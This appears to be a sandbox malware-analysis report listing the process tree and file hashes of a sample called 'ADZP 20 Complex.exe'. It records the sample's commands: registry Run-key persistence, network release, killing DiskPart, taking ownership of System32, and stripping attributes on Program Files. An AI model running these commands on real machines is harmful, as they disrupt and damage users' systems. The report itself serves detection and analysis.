"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8823.tmp\8824.tmp\8825.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F35.tmp\8F36.tmp\8F37.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\96C3.tmp\96C4.tmp\96C5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19360813717422815761624925029-56308644718919876791523634329-4575256441454145225"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB53.tmp\BB54.tmp\BB55.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\BE80.tmp\BE81.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF88.tmp\BF98.tmp\BF99.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C571.tmp\C572.tmp\C573.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C5AF.tmp\C5B0.tmp\C5B1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C5DE.tmp\C5DF.tmp\C5E0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
Network
Files
C:\Users\Admin\AppData\Local\Temp\317C.tmp\317D.tmp\317E.bat
| MD5 | 190e7cfa7d6de532ba4498ca3d38b47d |
| SHA1 | 7d4ea5ce61962c0445d955a44dd31226fa8c736e |
| SHA256 | faee2b0ac2218435a6973b87277b29010c988efefdcd7fe0e107808c2cc0f282 |
| SHA512 | 5a87b4bac67957acbc6dfab08cf9b3e1110e4b496b66110a44f7b2d0ec75b950d7569b6220c4a5ab3597db032e70b16d5a5e6ee4ab23102f6d12fea7bdc11598 |
C:\Windows\System32\Twain_20.dll
| MD5 | 8b6a377f9a67d5482a8eba5708f45bb2 |
| SHA1 | 7197436525e568606850ee5e033c43aea1c3bc91 |
| SHA256 | 6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f |
| SHA512 | 644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 0c998e3681eb9f67fbacda38281c5fa7 |
| SHA1 | bd3e89780f374c54c5dfbe3fab83a926ca5803de |
| SHA256 | 3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205 |
| SHA512 | 11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 72946942abf5cf295f726b816c531ebf |
| SHA1 | 8ac5ccae8003c3776c2e0ee0959a76c8bc913495 |
| SHA256 | d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25 |
| SHA512 | 2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 11aa52a7eca2cf8fdcd1584b5a8b6026 |
| SHA1 | 01ae6066e6b3879cb0caf306cc91077b7c0bea1e |
| SHA256 | 8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11 |
| SHA512 | 07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5 |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | b39df423c6e5978065a9a8ec4879a3b4 |
| SHA1 | 96441a7a7d8090f7a96a1160f539531f66568e88 |
| SHA256 | 12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967 |
| SHA512 | 2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 888e64c554686bbbc0499057cce1af36 |
| SHA1 | 5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006 |
| SHA256 | 616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d |
| SHA512 | 9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | f42cb46a07f5cdf621107b5a08404c02 |
| SHA1 | a44bb59c1b4a2ceecd87c350421df44735492aaa |
| SHA256 | d447bcd466e347999275ba81bdb8edba74b349f823c59087c58a00774c1022c7 |
| SHA512 | e49ced200f1d30c6d028387d4153e12ca9a2c52a4ae89554f126e0af9ef8d6d7190fd3fb46f2472b9960a6716c0182166bbda06b98b07f309f013dfacbc89c59 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | cfb046d3c9513b92c1b287da26f97c28 |
| SHA1 | ea8208c4dad826b7fdb3b5b728863a95e86d4383 |
| SHA256 | a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b |
| SHA512 | dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340 |
memory/536-388-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/2988-390-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
memory/1220-389-0x000007FEF76B0000-0x000007FEF76FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | f218b9d6828a04b1455c948686b23a95 |
| SHA1 | 74613c0e5ce75a29dcd36cfb485df4b6ba3d0865 |
| SHA256 | 508729cbdbc4590b240a894282823cf93d8cf956fcfff65006c6e8c553e2370e |
| SHA512 | 6ceaf81d8849b5aa889bf0df6137a514a444b6f4326a0033daf39bd1e4f79bbd400bf519163c905af7ad89636a132ad12984b088df9b1e91ae1d973784bcac5e |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | c7f2bc79dba9b078638f4692947066b0 |
| SHA1 | a42bea02d22367788cb2dc77f68ea754c244a50c |
| SHA256 | 7be75820d337a48c320e260fb71f40a5a0cbfa5c8c225bec5ff23c1cc15566f7 |
| SHA512 | 33f2a1c3708d4b3b353122105931ddb34dc4be146ffa73b24dee1eaaeb60f0eed2c3bbf4ad84d648f6408c8b9e0cbbbc421864514c1e057b0cea2c12b2c5d296 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | fcd3a4ee58b1a2815f71032c4bf36bf1 |
| SHA1 | b6fa91a077cb9c06314b2ab01670e150b5a7e8bf |
| SHA256 | fda91f38085ed16fa3d6da6fba5e3b0d597c23c124c886a0764246b2ea33152b |
| SHA512 | 649eb6e9907089ec7ec385a457b86ca28e96032860380c11cd0701903baadabd0091f00bda2c984453b4fdf85943203a277439852b11b46a7b44971e0acd21e4 |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | 05a4d4594b598cfe885bf862787b8cde |
| SHA1 | dfb26e156e88af25bd00db0bc788b81c521a4db9 |
| SHA256 | fd8427db8c0c5ad2c7a8fc36c18f9400e25bdd7dfd1d267ec11a7a94bdbd1cab |
| SHA512 | ac1f87eabd69e1939f463c8710cdd1ba8a886ad6509d26d0fac4e09ab82056cf952b7a0cf2ecb55bb0549fdb0aff6457133eeb6b7b222df58f773f91df101136 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | d3715d7f77349116a701484780269375 |
| SHA1 | 589c48410637ac33431569b867070a51c4de5b1c |
| SHA256 | ea0bdd86d283aba33d619aeecb5087ad9132b58e8ae7121e3c3774504abb976a |
| SHA512 | 9526a79ac4f9a18104f8e84d684136eef9b6bbccfe772d1d1030d9be02de2f7221cdee248ec748971551a42ed1d8fb1c8a9d820b837164f68376cdee1dc8ff3a |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | b2206e980c51067d6e9dd7575d842bdc |
| SHA1 | 5aa6f76eee9efd569089be7f363e30ebf0531a22 |
| SHA256 | add106f3d6e9cfd2fac3d14a74d6791a9caa257b9c7e105a9a5fc2a309337ecd |
| SHA512 | 89ab3ca635f8fdcb1206f0a1d585355a730506cc1d72ca666f1e9d650b24107368349b44ab0b3d3132442a2fc61c0c9404d00b717a61f305d9c93d5d638d9bec |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | d5980bf4b018e4c397df95afe8941c66 |
| SHA1 | ce53c669a898d09479831bc59bc31a5fba2a6f2b |
| SHA256 | 9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a |
| SHA512 | c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 35ecc8cfdd94d17cac636bc542434869 |
| SHA1 | 8247ac65fd9a043e90099de789102e0ed94ce7d8 |
| SHA256 | 49a9beac6a4e5cee83721ad911ded576f6efdfda14a69e58df369f8459650567 |
| SHA512 | d064f1278a60647d8d8a5bb7e122670cc1eddb4c211d6fb1e85377a715e7bdf9b60d8cfdcb29604a7a73f3c79c0f6dd5661b2e18fba4e34ff3f01c4a55e8fb33 |
C:\Windows\System32\Twain_20.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 5882b663e046cee368f1c8a178e839c4 |
| SHA1 | 63fad4916c00f784e7c2bf966e391e2b36e625f9 |
| SHA256 | 4df10f6ead9437c3d2e84757e72530d2ff3a609683bd551c2a0cdb291a6b31fd |
| SHA512 | 46148d8f2c0c5a83ebe21f6c83abb6d393043df9bb3dda219799e61d28b54578ea7691c38fc7342445da39f9fb3ddcd03537e9833cf71d7489c93dee65ba7efc |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | b20421aba6b1738af56e402aed7b5fca |
| SHA1 | 7b9e8f147c25a383e775cf4ce66fec5f050f8187 |
| SHA256 | 2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd |
| SHA512 | 32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | d72c8f42da75fd710f2c2049ef99ae22 |
| SHA1 | 4ba68526f571015d92d168d782bef2279886c64e |
| SHA256 | 2888909ce97c3aec42762412c31a8dec522a38dd3c4f37392efed2f22cd6ea93 |
| SHA512 | aab64bb5c94670d6154e5d72239390c9e484100b5563ab5a67e1495c4d374ed8cbdb6d84d6bd7e72816173b5a25c1c52ad9e18468d5d7444e1c44216f85b9811 |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | ad0010095a82da61b486dbe70cd90767 |
| SHA1 | 67d5a65f8cee8409dfcec2da99d290a2730cd662 |
| SHA256 | 28d651bd0e01d8ee66b46b064b05841cf33e44f3c55ee8b0612f5a812bf0de43 |
| SHA512 | 93a5f5c2f71a00ce760f1efe89280e259b3f75f1d04e3a1708d683c0b9a619fb5ac577e0d9f59c3b767c3b45323e3af9450362624526705766bf77a94b4aa827 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 089381a847f01ba0962ae00f0d92d5e8 |
| SHA1 | 9f3240f89871639778a318e0cadccafcf9d7c55e |
